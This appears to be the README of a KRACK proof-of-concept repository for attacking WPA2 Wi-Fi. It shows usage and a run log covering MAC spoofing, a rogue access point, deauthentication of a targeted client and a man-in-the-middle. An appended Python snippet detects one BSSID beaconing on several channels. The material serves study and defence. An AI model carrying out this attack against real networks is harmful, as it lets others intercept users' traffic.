Hackndo / Krack Poc

[NO SUPPORT] PoC Krack (Key Reinstallation AttaCKs)

PLEASE READ: I have no intention to update or maintain this code. Feel free to use and modify it, but I won't answer any comment/issue anymore. This project was difficult; I learnt what I wanted to learn and developed what I wanted to develop: a quick win to validate my comprehension of the vulnerability.

Proof of concept for Krack attack using channel-based MitM

Theory

French article on hackndo

Environment

WPA2 with CCMP

Usage

# ./Krack.py -h
usage: Krack.py [-h] [-d] -a ACCESS_POINT -i IFACE_AP -b CLIENT -j
                IFACE_CLIENT -c CHANNEL

optional arguments:
  -h, --help            show this help message and exit
  -d, --direct          Skip channel and monitor settings
  -a ACCESS_POINT, --access_point ACCESS_POINT
                        Enter the SSID of the specific access point to target
  -i IFACE_AP, --iface_ap IFACE_AP
                        Enter the SSID of the specific access point to target
  -b CLIENT, --client CLIENT
                        Enter the MAC address of the specific client to target
  -j IFACE_CLIENT, --iface_client IFACE_CLIENT
                        Enter the SSID of the specific access point to target
  -c CHANNEL, --channel CHANNEL
                        Choose channel on which the targeted access point is
                        listening on

# ./Krack.py -a hackndo_ssid_test -i wlan1 -b "ab:cd:0a:0b:11:22" -j wlan0 -c 11
[*] Turning off both interfaces
[*] Setting interface wlan1 on channel 11
[*] Interface wlan1 is on channel 11
[*] Setting interface wlan0 on channel 4
[*] Interface wlan0 is on channel 4
[*] Starting monitor mode for wlan1
[*] Interface wlan1 is now in monitor mode
[*] Starting monitor mode for wlan0
[*] Interface wlan0 is now in monitor mode
[*] Turning on both interfaces
[*] Trying to find hackndo_ssid_test MAC address
[*] MAC Found ! 0e:cc:46:8a:b1:09
[*] Jammer initialized correctly
[*] Sniffing an AP Beacon...
[*] AP Beacon saved!
[*] Sniffing an AP Probe response...
[*] AP Probe response saved!
[*] Updating wlan1 MAC address to ab:cd:0a:0b:11:22 (Client MAC)
[*] wlan1 MAC address update successful
[*] Updating wlan0 MAC address to 0e:cc:46:8a:b1:09 (Real AP MAC)
[*] wlan0 MAC address update successful
[*] Rogue AP started. Sending beacons...
[*] Running main loop
[*] Starting deauth on AP 0e:cc:46:8a:b1:09 (hackndo_ssid_test) and client ab:cd:0a:0b:11:22...
[*] Probe request to our AP
[*] Client authenticated to our AP!
[*] MitM attack has started
[*] Deauth stopped

TODO

  • [X] Use CSA (Channel Switch Announcement) to make client switch channel after deauth (See issue #1)
  • [ ] Save data sent by client
  • [ ] Break cryptography with known plain text when counter is reinitialized
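
Detection note (an added example, not code from this project): in the run above the rogue AP takes the real AP's MAC on a second channel (11 and 4 in the log), so a single BSSID beaconing on two channels within a short window is a usable signal for a monitoring sensor. The function names, the 10-second window and the beacon element bytes below are assumptions constructed for illustration; only the SSID, BSSID and channel numbers come from the log.

```python
from collections import defaultdict

IE_SSID, IE_DS_PARAMS, IE_CSA = 0, 3, 37  # 802.11 information element IDs

def parse_ies(body: bytes) -> dict:
    """Walk the tag/length/value elements that follow a beacon's fixed fields."""
    out, i = {}, 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:            # truncated element: keep what parsed so far
            break
        if tag == IE_SSID:
            out["ssid"] = value.decode("utf-8", "replace")
        elif tag == IE_DS_PARAMS and length == 1:
            out["channel"] = value[0]      # channel the sender claims to be on
        elif tag == IE_CSA and length == 3:
            out["csa_new_channel"] = value[1]   # layout: mode, new channel, count
        i += 2 + length
    return out

def find_multichannel_bssids(observations, window=10.0):
    """observations: iterable of (timestamp, bssid, element_bytes).
    Returns {bssid: sorted channels} for BSSIDs advertising more than one
    channel within `window` seconds (hypothetical threshold)."""
    seen = defaultdict(list)               # bssid -> [(timestamp, channel)]
    alerts = {}
    for ts, bssid, body in sorted(observations, key=lambda o: o[0]):
        info = parse_ies(body)
        if "channel" not in info:
            continue
        recent = [(t, c) for t, c in seen[bssid] if ts - t <= window]
        recent.append((ts, info["channel"]))
        seen[bssid] = recent
        channels = {c for _, c in recent}
        if len(channels) > 1:
            alerts[bssid] = sorted(channels)
    return alerts

def ie(tag, value):                        # builds one constructed sample element
    return bytes([tag, len(value)]) + value

SSID = ie(IE_SSID, b"hackndo_ssid_test")
SAMPLE = [  # constructed observations; SSID, BSSID and channels mirror the log above
    (0.0, "0e:cc:46:8a:b1:09", SSID + ie(IE_DS_PARAMS, bytes([11]))),
    (0.1, "0e:cc:46:8a:b1:09", SSID + ie(IE_DS_PARAMS, bytes([11])) + ie(IE_CSA, bytes([1, 4, 1]))),
    (0.2, "0e:cc:46:8a:b1:09", SSID + ie(IE_DS_PARAMS, bytes([4]))),
    (0.3, "aa:bb:cc:00:00:01", ie(IE_SSID, b"other") + ie(IE_DS_PARAMS, bytes([6]))),
]

if __name__ == "__main__":
    print(find_multichannel_bssids(SAMPLE))
```

A Channel Switch Announcement on its own is normal (for example during DFS), so `csa_new_channel` is best treated as context that corroborates a multi-channel alert rather than as an alert by itself.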